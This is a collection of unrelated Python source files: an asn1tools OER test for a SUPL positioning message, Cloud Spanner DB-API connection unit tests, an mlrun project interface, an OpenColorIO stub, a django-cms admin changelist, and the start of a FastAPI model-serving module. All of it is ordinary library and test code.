'version': {'maj': 2, 'min': 0, 'servind': 0},
'sessionID': {
'setSessionID': {
'sessionId': 8838,
'setId': ('imsi', b'\x64\x00\x00\x00\x00\x00\x20\xf2')
},
'slpSessionID': {
'sessionID': b'\x00\x00\x40\x00',
'slpId': ('iPAddress', ('ipv4Address', b'\x7f\x00\x00\x01'))
}
},
'message': (
'msSUPLPOSINIT', {
'sETCapabilities': {
'posTechnology': {
'agpsSETassisted': True,
'agpsSETBased': True,
'autonomousGPS': False,
'aFLT': False,
'eCID': True,
'eOTD': False,
'oTDOA': True,
'ver2-PosTechnology-extension': {
'gANSSPositionMethods': [
{
'ganssId': 4,
'gANSSPositioningMethodTypes': {
'setAssisted': True,
'setBased': True,
'autonomous': True
},
'gANSSSignals': (b'\x80', 1)
}
]
}
},
'prefMethod': 'noPreference',
'posProtocol': {
'tia801': False,
'rrlp': False,
'rrc': False,
'ver2-PosProtocol-extension': {
'lpp': True,
'posProtocolVersionLPP': {
'majorVersionField': 12,
'technicalVersionField': 4,
'editorialVersionField': 0
}
}
}
},
'locationId': {
'cellInfo': (
'ver2-CellInfo-extension', (
'lteCell',
{
'cellGlobalIdEUTRA': {
'plmn-Identity': {
'mcc': [3, 1, 0],
'mnc': [3, 1, 0]
},
'cellIdentity': (b'\x34\xa3\x20\x20', 28)
},
'physCellId': 304,
'trackingAreaCode': (b'\x13\x8e', 16),
'rsrpResult': 59,
'rsrqResult': 24,
'tA': 1,
'measResultListEUTRA': [
{
'physCellId': 275,
'measResult': {
'rsrpResult': 45,
'rsrqResult': 14
}
},
{
'physCellId': 200,
'measResult': {
'rsrpResult': 39,
'rsrqResult': 8
}
}
]
}
)
),
'status': 'current'
},
'sUPLPOS': {
'posPayLoad': (
'ver2-PosPayLoad-extension',
{
'lPPPayload': [
b'\x92\x2b\x08\x31\xe2\x00\x5d\x00\x82\x17'
b'\x40\x27\x04\x88\x22\x1b\x80\x00\x2d\xe4'
b'\x00\x00\x41\x88\x3c\x09\x24\x30\x44\x18'
b'\xb3\x18\x66\x8f\xc0\x03\x24\x01\x01',
b'\x92\x2c\x10\x62\x62\x13\x10\x34\xa3\x20'
b'\x26\xa4\x01\x40\x84\x00\x00\x00\x00\x01'
b'\x41\x20\x02\x00\x00\x00\x00'
]
}
)
},
'ver': (b'\x52\x88\xec\xab\xa9\x37\x5c\x4e', 64)
}
)
}
encoded = (
b'\x00\xa2\x02\x00\x00\xc0\x22\x86\x30\x64\x00\x00\x00\x00\x00'
b'\x20\xf2\x00\x00\x40\x00\x00\x7f\x00\x00\x01\x31\xb9\x40\x40'
b'\x04\x40\x47\x00\x80\xa0\x04\x04\x0c\x0c\x04\x00\x40\x00\x1b'
b'\x27\xa6\x21\x31\x00\x34\xa3\x20\x20\x01\x30\x13\x8e\x76\xc0'
b'\x00\x01\x20\x01\x13\x6b\x4e\x00\x00\xc8\x69\xc8\x24\x00\x47'
b'\x48\x00\x26\x92\x2b\x08\x31\xe2\x00\x5d\x00\x82\x17\x40\x27'
b'\x04\x88\x22\x1b\x80\x00\x2d\xe4\x00\x00\x41\x88\x3c\x09\x24'
b'\x30\x44\x18\xb3\x18\x66\x8f\xc0\x03\x24\x01\x01\x00\x1a\x92'
b'\x2c\x10\x62\x62\x13\x10\x34\xa3\x20\x26\xa4\x01\x40\x84\x00'
b'\x00\x00\x00\x01\x41\x20\x02\x00\x00\x00\x00\x52\x88\xec\xab'
b'\xa9\x37\x5c\x4e'
)
self.assert_encode_decode(ulp, 'ULP-PDU', decoded, encoded)
def test_not_support_decode_with_length(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= OCTET STRING "
"END",
'oer')
with self.assertRaises(NotImplementedError) as cm:
foo.decode_with_length('A', b'\x01\x23\x45\x67\x89\xab\xcd\xef')
self.assertEqual(str(cm.exception), "This codec does not support decode_with_length().")
if __name__ == '__main__':
unittest.main()
|
import abc
import typing
import sqlalchemy.orm
import mlrun.api.db.session
import mlrun.api.schemas
import mlrun.utils.singleton
from mlrun.utils import logger
class Member(abc.ABC):
@abc.abstractmethod
def initialize(self):
pass
@abc.abstractmethod
def shutdown(self):
pass
def ensure_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
wait_for_completion: bool = True,
auth_info: mlrun.api.schemas.AuthInfo = mlrun.api.schemas.AuthInfo(),
) -> bool:
project_names = self.list_projects(
db_session,
format_=mlrun.api.schemas.ProjectsFormat.name_only,
leader_session=auth_info.session,
)
if name in project_names.projects:
return False
logger.info(
"Ensure project called, but project does not exist. Creating", name=name
)
project = mlrun.api.schemas.Project(
metadata=mlrun.api.schemas.ProjectMetadata(name=name),
)
self.create_project(
db_session,
project,
leader_session=auth_info.session,
wait_for_completion=wait_for_completion,
)
return True
@abc.abstractmethod
def create_project(
self,
db_session: sqlalchemy.orm.Session,
project: mlrun.api.schemas.Project,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
wait_for_completion: bool = True,
) -> typing.Tuple[mlrun.api.schemas.Project, bool]:
pass
@abc.abstractmethod
def store_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
project: mlrun.api.schemas.Project,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
wait_for_completion: bool = True,
) -> typing.Tuple[mlrun.api.schemas.Project, bool]:
pass
@abc.abstractmethod
def patch_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
project: dict,
patch_mode: mlrun.api.schemas.PatchMode = mlrun.api.schemas.PatchMode.replace,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
wait_for_completion: bool = True,
) -> typing.Tuple[mlrun.api.schemas.Project, bool]:
pass
@abc.abstractmethod
def delete_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
deletion_strategy: mlrun.api.schemas.DeletionStrategy = mlrun.api.schemas.DeletionStrategy.default(),
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
auth_info: mlrun.api.schemas.AuthInfo = mlrun.api.schemas.AuthInfo(),
wait_for_completion: bool = True,
) -> bool:
pass
@abc.abstractmethod
def get_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
leader_session: typing.Optional[str] = None,
) -> mlrun.api.schemas.Project:
pass
@abc.abstractmethod
def list_projects(
self,
db_session: sqlalchemy.orm.Session,
owner: str = None,
format_: mlrun.api.schemas.ProjectsFormat = mlrun.api.schemas.ProjectsFormat.full,
labels: typing.List[str] = None,
state: mlrun.api.schemas.ProjectState = None,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
names: typing.Optional[typing.List[str]] = None,
) -> mlrun.api.schemas.ProjectsOutput:
pass
@abc.abstractmethod
def get_project_owner(
self, db_session: sqlalchemy.orm.Session, name: str,
) -> mlrun.api.schemas.ProjectOwner:
pass
|
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
from algolib.disjoint_set import DisjointSet
|
# Copyright 2020 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Spanner DB-API Connection class unit tests."""
import mock
import unittest
import warnings
def _make_credentials():
from google.auth import credentials
class _CredentialsWithScopes(credentials.Credentials, credentials.Scoped):
pass
return mock.Mock(spec=_CredentialsWithScopes)
class TestConnection(unittest.TestCase):
PROJECT = "test-project"
INSTANCE = "test-instance"
DATABASE = "test-database"
USER_AGENT = "user-agent"
CREDENTIALS = _make_credentials()
def _get_client_info(self):
from google.api_core.gapic_v1.client_info import ClientInfo
return ClientInfo(user_agent=self.USER_AGENT)
def _make_connection(self):
from google.cloud.spanner_dbapi import Connection
from google.cloud.spanner_v1.instance import Instance
# We don't need a real Client object to test the constructor
instance = Instance(self.INSTANCE, client=None)
database = instance.database(self.DATABASE)
return Connection(instance, database)
def test_autocommit_setter_transaction_not_started(self):
connection = self._make_connection()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection.autocommit = True
mock_commit.assert_not_called()
self.assertTrue(connection._autocommit)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection.autocommit = False
mock_commit.assert_not_called()
self.assertFalse(connection._autocommit)
def test_autocommit_setter_transaction_started(self):
connection = self._make_connection()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection._transaction = mock.Mock(committed=False, rolled_back=False)
connection.autocommit = True
mock_commit.assert_called_once()
self.assertTrue(connection._autocommit)
def test_autocommit_setter_transaction_started_commited_rolled_back(self):
connection = self._make_connection()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection._transaction = mock.Mock(committed=True, rolled_back=False)
connection.autocommit = True
mock_commit.assert_not_called()
self.assertTrue(connection._autocommit)
connection.autocommit = False
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.commit"
) as mock_commit:
connection._transaction = mock.Mock(committed=False, rolled_back=True)
connection.autocommit = True
mock_commit.assert_not_called()
self.assertTrue(connection._autocommit)
def test_property_database(self):
from google.cloud.spanner_v1.database import Database
connection = self._make_connection()
self.assertIsInstance(connection.database, Database)
self.assertEqual(connection.database, connection._database)
def test_property_instance(self):
from google.cloud.spanner_v1.instance import Instance
connection = self._make_connection()
self.assertIsInstance(connection.instance, Instance)
self.assertEqual(connection.instance, connection._instance)
def test__session_checkout(self):
from google.cloud.spanner_dbapi import Connection
with mock.patch("google.cloud.spanner_v1.database.Database") as mock_database:
mock_database._pool = mock.MagicMock()
mock_database._pool.get = mock.MagicMock(return_value="db_session_pool")
connection = Connection(self.INSTANCE, mock_database)
connection._session_checkout()
mock_database._pool.get.assert_called_once_with()
self.assertEqual(connection._session, "db_session_pool")
connection._session = "db_session"
connection._session_checkout()
self.assertEqual(connection._session, "db_session")
def test__release_session(self):
from google.cloud.spanner_dbapi import Connection
with mock.patch("google.cloud.spanner_v1.database.Database") as mock_database:
mock_database._pool = mock.MagicMock()
mock_database._pool.put = mock.MagicMock()
connection = Connection(self.INSTANCE, mock_database)
connection._session = "session"
connection._release_session()
mock_database._pool.put.assert_called_once_with("session")
self.assertIsNone(connection._session)
def test_transaction_checkout(self):
from google.cloud.spanner_dbapi import Connection
connection = Connection(self.INSTANCE, self.DATABASE)
connection._session_checkout = mock_checkout = mock.MagicMock(autospec=True)
connection.transaction_checkout()
mock_checkout.assert_called_once_with()
connection._transaction = mock_transaction = mock.MagicMock()
mock_transaction.committed = mock_transaction.rolled_back = False
self.assertEqual(connection.transaction_checkout(), mock_transaction)
connection._autocommit = True
self.assertIsNone(connection.transaction_checkout())
def test_close(self):
from google.cloud.spanner_dbapi import connect, InterfaceError
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=True
):
connection = connect("test-instance", "test-database")
self.assertFalse(connection.is_closed)
connection.close()
self.assertTrue(connection.is_closed)
with self.assertRaises(InterfaceError):
connection.cursor()
connection._transaction = mock_transaction = mock.MagicMock()
mock_transaction.committed = mock_transaction.rolled_back = False
mock_transaction.rollback = mock_rollback = mock.MagicMock()
connection.close()
mock_rollback.assert_called_once_with()
@mock.patch.object(warnings, "warn")
def test_commit(self, mock_warn):
from google.cloud.spanner_dbapi import Connection
from google.cloud.spanner_dbapi.connection import AUTOCOMMIT_MODE_WARNING
connection = Connection(self.INSTANCE, self.DATABASE)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.commit()
mock_release.assert_not_called()
connection._transaction = mock_transaction = mock.MagicMock(
rolled_back=False, committed=False
)
mock_transaction.commit = mock_commit = mock.MagicMock()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.commit()
mock_commit.assert_called_once_with()
mock_release.assert_called_once_with()
connection._autocommit = True
connection.commit()
mock_warn.assert_called_once_with(
AUTOCOMMIT_MODE_WARNING, UserWarning, stacklevel=2
)
@mock.patch.object(warnings, "warn")
def test_rollback(self, mock_warn):
from google.cloud.spanner_dbapi import Connection
from google.cloud.spanner_dbapi.connection import AUTOCOMMIT_MODE_WARNING
connection = Connection(self.INSTANCE, self.DATABASE)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.rollback()
mock_release.assert_not_called()
connection._transaction = mock_transaction = mock.MagicMock()
mock_transaction.rollback = mock_rollback = mock.MagicMock()
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection._release_session"
) as mock_release:
connection.rollback()
mock_rollback.assert_called_once_with()
mock_release.assert_called_once_with()
connection._autocommit = True
connection.rollback()
mock_warn.assert_called_once_with(
AUTOCOMMIT_MODE_WARNING, UserWarning, stacklevel=2
)
def test_run_prior_DDL_statements(self):
from google.cloud.spanner_dbapi import Connection, InterfaceError
with mock.patch(
"google.cloud.spanner_v1.database.Database", autospec=True
) as mock_database:
connection = Connection(self.INSTANCE, mock_database)
connection.run_prior_DDL_statements()
mock_database.update_ddl.assert_not_called()
ddl = ["ddl"]
connection._ddl_statements = ddl
connection.run_prior_DDL_statements()
mock_database.update_ddl.assert_called_once_with(ddl)
connection.is_closed = True
with self.assertRaises(InterfaceError):
connection.run_prior_DDL_statements()
def test_context(self):
connection = self._make_connection()
with connection as conn:
self.assertEqual(conn, connection)
self.assertTrue(connection.is_closed)
def test_connect(self):
from google.cloud.spanner_dbapi import Connection, connect
with mock.patch("google.cloud.spanner_v1.Client"):
with mock.patch(
"google.api_core.gapic_v1.client_info.ClientInfo",
return_value=self._get_client_info(),
):
connection = connect(
self.INSTANCE,
self.DATABASE,
self.PROJECT,
self.CREDENTIALS,
self.USER_AGENT,
)
self.assertIsInstance(connection, Connection)
def test_connect_instance_not_found(self):
from google.cloud.spanner_dbapi import connect
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=False
):
with self.assertRaises(ValueError):
connect("test-instance", "test-database")
def test_connect_database_not_found(self):
from google.cloud.spanner_dbapi import connect
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=False
):
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
with self.assertRaises(ValueError):
connect("test-instance", "test-database")
def test_default_sessions_pool(self):
from google.cloud.spanner_dbapi import connect
with mock.patch("google.cloud.spanner_v1.instance.Instance.database"):
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
connection = connect("test-instance", "test-database")
self.assertIsNotNone(connection.database._pool)
def test_sessions_pool(self):
from google.cloud.spanner_dbapi import connect
from google.cloud.spanner_v1.pool import FixedSizePool
database_id = "test-database"
pool = FixedSizePool()
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.database"
) as database_mock:
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True
):
connect("test-instance", database_id, pool=pool)
database_mock.assert_called_once_with(database_id, pool=pool)
def test_run_statement_remember_statements(self):
"""Check that Connection remembers executed statements."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
sql = """SELECT 23 FROM table WHERE id = @a1"""
params = {"a1": "value"}
param_types = {"a1": str}
connection = self._make_connection()
statement = Statement(sql, params, param_types, ResultsChecksum(), False)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.transaction_checkout"
):
connection.run_statement(statement)
self.assertEqual(connection._statements[0].sql, sql)
self.assertEqual(connection._statements[0].params, params)
self.assertEqual(connection._statements[0].param_types, param_types)
self.assertIsInstance(connection._statements[0].checksum, ResultsChecksum)
def test_run_statement_dont_remember_retried_statements(self):
"""Check that Connection doesn't remember re-executed statements."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
sql = """SELECT 23 FROM table WHERE id = @a1"""
params = {"a1": "value"}
param_types = {"a1": str}
connection = self._make_connection()
statement = Statement(sql, params, param_types, ResultsChecksum(), False)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.transaction_checkout"
):
connection.run_statement(statement, retried=True)
self.assertEqual(len(connection._statements), 0)
def test_run_statement_w_homogeneous_insert_statements(self):
"""Check that Connection executed homogeneous insert statements."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
sql = "INSERT INTO T (f1, f2) VALUES (%s, %s), (%s, %s)"
params = ["a", "b", "c", "d"]
param_types = {"f1": str, "f2": str}
connection = self._make_connection()
statement = Statement(sql, params, param_types, ResultsChecksum(), True)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.transaction_checkout"
):
connection.run_statement(statement, retried=True)
self.assertEqual(len(connection._statements), 0)
def test_clear_statements_on_commit(self):
"""
Check that all the saved statements are
cleared, when the transaction is commited.
"""
connection = self._make_connection()
connection._transaction = mock.Mock(rolled_back=False, committed=False)
connection._statements = [{}, {}]
self.assertEqual(len(connection._statements), 2)
with mock.patch("google.cloud.spanner_v1.transaction.Transaction.commit"):
connection.commit()
self.assertEqual(len(connection._statements), 0)
def test_clear_statements_on_rollback(self):
"""
Check that all the saved statements are
cleared, when the transaction is roll backed.
"""
connection = self._make_connection()
connection._transaction = mock.Mock()
connection._statements = [{}, {}]
self.assertEqual(len(connection._statements), 2)
with mock.patch("google.cloud.spanner_v1.transaction.Transaction.commit"):
connection.rollback()
self.assertEqual(len(connection._statements), 0)
def test_retry_transaction(self):
"""Check retrying an aborted transaction."""
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
connection = self._make_connection()
checksum = ResultsChecksum()
checksum.consume_result(row)
retried_checkum = ResultsChecksum()
statement = Statement("SELECT 1", [], {}, checksum, False)
connection._statements.append(statement)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.run_statement",
return_value=([row], retried_checkum),
) as run_mock:
with mock.patch(
"google.cloud.spanner_dbapi.connection._compare_checksums"
) as compare_mock:
connection.retry_transaction()
compare_mock.assert_called_with(checksum, retried_checkum)
run_mock.assert_called_with(statement, retried=True)
def test_retry_transaction_checksum_mismatch(self):
"""
Check retrying an aborted transaction
with results checksums mismatch.
"""
from google.cloud.spanner_dbapi.exceptions import RetryAborted
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
retried_row = ["field3", "field4"]
connection = self._make_connection()
checksum = ResultsChecksum()
checksum.consume_result(row)
retried_checkum = ResultsChecksum()
statement = Statement("SELECT 1", [], {}, checksum, False)
connection._statements.append(statement)
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.run_statement",
return_value=([retried_row], retried_checkum),
):
with self.assertRaises(RetryAborted):
connection.retry_transaction()
def test_commit_retry_aborted_statements(self):
"""Check that retried transaction executing the same statements."""
from google.api_core.exceptions import Aborted
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.connection import connect
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True,
):
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=True,
):
connection = connect("test-instance", "test-database")
cursor = connection.cursor()
cursor._checksum = ResultsChecksum()
cursor._checksum.consume_result(row)
statement = Statement("SELECT 1", [], {}, cursor._checksum, False)
connection._statements.append(statement)
connection._transaction = mock.Mock(rolled_back=False, committed=False)
with mock.patch.object(
connection._transaction, "commit", side_effect=(Aborted("Aborted"), None),
):
with mock.patch(
"google.cloud.spanner_dbapi.connection.Connection.run_statement",
return_value=([row], ResultsChecksum()),
) as run_mock:
connection.commit()
run_mock.assert_called_with(statement, retried=True)
def test_retry_transaction_drop_transaction(self):
"""
Check that before retrying an aborted transaction
connection drops the original aborted transaction.
"""
connection = self._make_connection()
transaction_mock = mock.Mock()
connection._transaction = transaction_mock
# as we didn't set any statements, the method
# will only drop the transaction object
connection.retry_transaction()
self.assertIsNone(connection._transaction)
def test_retry_aborted_retry(self):
"""
Check that in case of a retried transaction failed,
the connection will retry it once again.
"""
from google.api_core.exceptions import Aborted
from google.cloud.spanner_dbapi.checksum import ResultsChecksum
from google.cloud.spanner_dbapi.connection import connect
from google.cloud.spanner_dbapi.cursor import Statement
row = ["field1", "field2"]
with mock.patch(
"google.cloud.spanner_v1.instance.Instance.exists", return_value=True,
):
with mock.patch(
"google.cloud.spanner_v1.database.Database.exists", return_value=True,
):
connection = connect("test-instance", "test-database")
cursor = connection.cursor()
cursor._checksum = ResultsChecksum()
cursor._checksum.consume_result(row)
statement = Statement("SELECT 1", [], {}, cursor._checksum, False)
connection._statements.append(statement)
metadata_mock = mock.Mock()
metadata_mock.trailing_metadata.return_value = {}
with mock.patch.object(
connection,
"run_statement",
side_effect=(
Aborted("Aborted", errors=[metadata_mock]),
([row], ResultsChecksum()),
),
) as retry_mock:
connection.retry_transaction()
retry_mock.assert_has_calls(
(
mock.call(statement, retried=True),
mock.call(statement, retried=True),
)
)
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
class ColorSpace:
"""
A color space is the state of an image in terms of colorimetry and color
encoding. I.e., it defines how an image's color information needs to be
interpreted.
Transforming images between different color spaces is the primary
motivation for the OCIO library.
While a complete discussion of color spaces is beyond the scope of this
documentation, traditional uses would be to have color spaces describing
image capture devices, such as cameras and scanners, and internal
'convenience' spaces, such as scene-linear and logarithmic.
Color spaces are specific to a particular image precision
(float32, uint8, etc.). The set of color spaces that provide equivalent
mappings (at different precisions) are referred to as a 'family'.
.. code-block:: python
import PyOpenColorIO as OCIO
config = OCIO.Config()
"""
def __init__(self):
pass
def isEditable(self):
pass
def createEditableCopy(self):
pass
def getName(self):
pass
def setName(self, name):
pass
def getFamily(self):
pass
def setFamily(self, family):
pass
def getEqualityGroup(self):
pass
def setEqualityGroup(self, equalityGroup):
pass
def getDescription(self):
pass
def setDescription(self, desc):
pass
def getBitDepth(self):
pass
def setBitDepth(self, bitDepth):
pass
def isData(self):
"""
ColorSpaces that are data are treated a bit special. Basically, any
colorspace transforms you try to apply to them are ignored. (Think
of applying a gamut mapping transform to an ID pass). Also, the
:py:class:`PyOpenColorIO.DisplayTransform` process obeys special
'data min' and 'data max' args.
This is traditionally used for pixel data that represents non-color
pixel data, such as normals, point positions, ID information, etc.
"""
pass
def setIsData(self, isData):
pass
def getAllocation(self):
"""
If this colorspace needs to be transferred to a limited dynamic
range coding space (such as during display with a GPU path), use this
allocation to maximize bit efficiency.
"""
pass
def setAllocation(self, allocation):
pass
def getAllocationVars(self):
pass
def setAllocationVars(self, vars):
pass
def getTransform(self):
pass
def setTransform(self, transform, direction):
pass
|
# -*- coding: utf-8 -*-
import bisect
from cms.models import Title, Page, EmptyTitle
from cms.utils import get_language_list
from cms.utils.compat import DJANGO_1_5
from cms.utils.conf import get_cms_setting
from cms.utils.permissions import get_user_sites_queryset
from django.contrib.admin.views.main import ChangeList, ALL_VAR, IS_POPUP_VAR, \
ORDER_TYPE_VAR, ORDER_VAR, SEARCH_VAR
from django.contrib.sites.models import Site
import django
COPY_VAR = "copy"
def cache_tree_children(queryset):
"""
For all items in the queryset, set the '_cached_children' attribute to a
list. This attribute is in turn used by the 'get_children' method on the
item, which would otherwise (if '_cached_children' is not set) cause a
database query.
The queryset must be ordered by 'lft', or the function will put the children
in the wrong order.
"""
parents_dict = {}
# Loop through the queryset twice, so that the function works even if the
# mptt tree is broken. Since django caches querysets internally, the extra
# computation time is minimal.
for obj in queryset:
parents_dict[obj.pk] = obj
obj._cached_children = []
for obj in queryset:
parent = parents_dict.get(obj.parent_id)
if parent:
parent._cached_children.append(obj)
class CMSChangeList(ChangeList):
"""
Renders a Changelist - In our case it looks like a tree - it's the list of
*instances* in the Admin.
It is usually responsible for pagination (not here though, we have a
treeview)
"""
real_queryset = False
def __init__(self, request, *args, **kwargs):
from cms.utils.plugins import current_site
self._current_site = current_site(request)
super(CMSChangeList, self).__init__(request, *args, **kwargs)
try:
self.queryset = self.get_query_set(request)
except:
raise
self.get_results(request)
if self._current_site:
request.session['cms_admin_site'] = self._current_site.pk
self.set_sites(request)
def get_query_set(self, request=None):
if COPY_VAR in self.params:
del self.params[COPY_VAR]
if 'language' in self.params:
del self.params['language']
if 'page_id' in self.params:
del self.params['page_id']
if django.VERSION[1] > 3:
qs = super(CMSChangeList, self).get_query_set(request).drafts()
else:
qs = super(CMSChangeList, self).get_query_set().drafts()
if request:
site = self.current_site()
permissions = Page.permissions.get_change_id_list(request.user, site)
if permissions != Page.permissions.GRANT_ALL:
qs = qs.filter(pk__in=permissions)
# root_query_set is a read-only property in Django 1.6
# and will be removed in Django 1.8.
queryset_attr = 'root_query_set' if DJANGO_1_5 else 'root_queryset'
setattr(self, queryset_attr, self.root_query_set.filter(pk__in=permissions))
self.real_queryset = True
qs = qs.filter(site=self._current_site)
return qs
def is_filtered(self):
from cms.utils.plugins import SITE_VAR
lookup_params = self.params.copy() # a dictionary of the query string
for i in (ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR, SITE_VAR, 'language', 'page_id'):
if i in lookup_params:
del lookup_params[i]
if not lookup_params.items() and not self.query:
return False
return True
def get_results(self, request):
if self.real_queryset:
super(CMSChangeList, self).get_results(request)
if not self.is_filtered():
self.full_result_count = self.result_count = self.root_query_set.count()
else:
self.full_result_count = self.root_query_set.count()
def set_items(self, request):
site = self.current_site()
# Get all the pages, ordered by tree ID (it's convenient to build the
# tree using a stack now)
pages = self.get_query_set(request).drafts().order_by('tree_id', 'lft').select_related('publisher_public')
# Get lists of page IDs for which the current user has
# "permission to..." on the current site.
if get_cms_setting('PERMISSION'):
perm_edit_ids = Page.permissions.get_change_id_list(request.user, site)
perm_publish_ids = Page.permissions.get_publish_id_list(request.user, site)
perm_advanced_settings_ids = Page.permissions.get_advanced_settings_id_list(request.user, site)
restricted_ids = Page.permissions.get_restricted_id_list(site)
if perm_edit_ids and perm_edit_ids != Page.permissions.GRANT_ALL:
pages = pages.filter(pk__in=perm_edit_ids)
root_pages = []
pages = list(pages)
all_pages = pages[:] # That is, basically, a copy.
# Unfortunately we cannot use the MPTT builtin code for pre-caching
# the children here, because MPTT expects the tree to be 'complete'
# and otherwise complaints about 'invalid item order'
cache_tree_children(pages)
ids = dict((page.id, page) for page in pages)
for page in pages:
children = list(page.get_children())
# If the parent page is not among the nodes shown, this node should
# be a "root node". The filtering for this has already been made, so
# using the ids dictionary means this check is constant time
page.root_node = page.parent_id not in ids
if get_cms_setting('PERMISSION'):
# caching the permissions
page.permission_edit_cache = perm_edit_ids == Page.permissions.GRANT_ALL or page.pk in perm_edit_ids
page.permission_publish_cache = perm_publish_ids == Page.permissions.GRANT_ALL or page.pk in perm_publish_ids
page.permission_advanced_settings_cache = perm_advanced_settings_ids == Page.permissions.GRANT_ALL or page.pk in perm_advanced_settings_ids
page.permission_user_cache = request.user
page.permission_restricted = page.pk in restricted_ids
if page.root_node or self.is_filtered():
page.last = True
if len(children):
# TODO: WTF!?!
# The last one is not the last... wait, what?
# children should NOT be a queryset. If it is, check that
# your django-mptt version is 0.5.1
children[-1].last = False
page.menu_level = 0
root_pages.append(page)
if page.parent_id:
page.get_cached_ancestors(ascending=True)
else:
page.ancestors_ascending = []
# Because 'children' is the reverse-FK accessor for the 'parent'
# FK from Page->Page, we have to use wrong English here and set
# an attribute called 'childrens'. We are aware that this is WRONG
# but what should we do?
# If the queryset is filtered, do NOT set the 'childrens' attribute
# since *ALL* pages will be in the 'root_pages' list and therefore
# be displayed. (If the queryset is filtered, the result is not a
# tree but rather a flat list).
if self.is_filtered():
page.childrens = []
else:
page.childrens = children
for page in all_pages:
page.title_cache = {}
page.all_languages = []
if page.publisher_public_id:
page.publisher_public.title_cache = {}
page.publisher_public.all_languages = []
ids[page.publisher_public_id] = page.publisher_public
titles = Title.objects.filter(page__in=ids)
insort = bisect.insort # local copy to avoid globals lookup in the loop
for title in titles:
page = ids[title.page_id]
page.title_cache[title.language] = title
if not title.language in page.all_languages:
insort(page.all_languages, title.language)
site_id = self.current_site()
languages = get_language_list(site_id)
for page in all_pages:
for lang in languages:
if not lang in page.title_cache:
page.title_cache[lang] = EmptyTitle(lang)
self.root_pages = root_pages
def get_items(self):
return self.root_pages
def set_sites(self, request):
"""Sets sites property to current instance - used in tree view for
sites combo.
"""
if get_cms_setting('PERMISSION'):
self.sites = get_user_sites_queryset(request.user)
else:
self.sites = Site.objects.all()
self.has_access_to_multiple_sites = len(self.sites) > 1
def current_site(self):
return self._current_site
|
from typing import Callable, List, Dict, Union
import atexit
from collections.abc import Sequence
from copy import deepcopy
import os
from PIL import Image
from fastapi import FastAPI, UploadFile, File, Request
from fastapi.templating import Jinja2Templates
from pydantic import BaseModel
from datetime import datetime
import numpy as np
import torch
import sys
from .logger import Logger
app = FastAPI(
title="torch-deploy",
description="one line deployment for pytorch models"
)
config = None
inference_fn = None
pre = []
post = []
logger = None
templates = Jinja2Templates(directory=os.path.join(os.path.dirname(__file__), "templates"))
@atexit.register
def cleanup():
if logger is not None:
logger.close()
class ModelInput(BaseModel):
'''Pydantic Model to receive parameters for the /predict endpoint'''
inputs: Union[List, Dict]
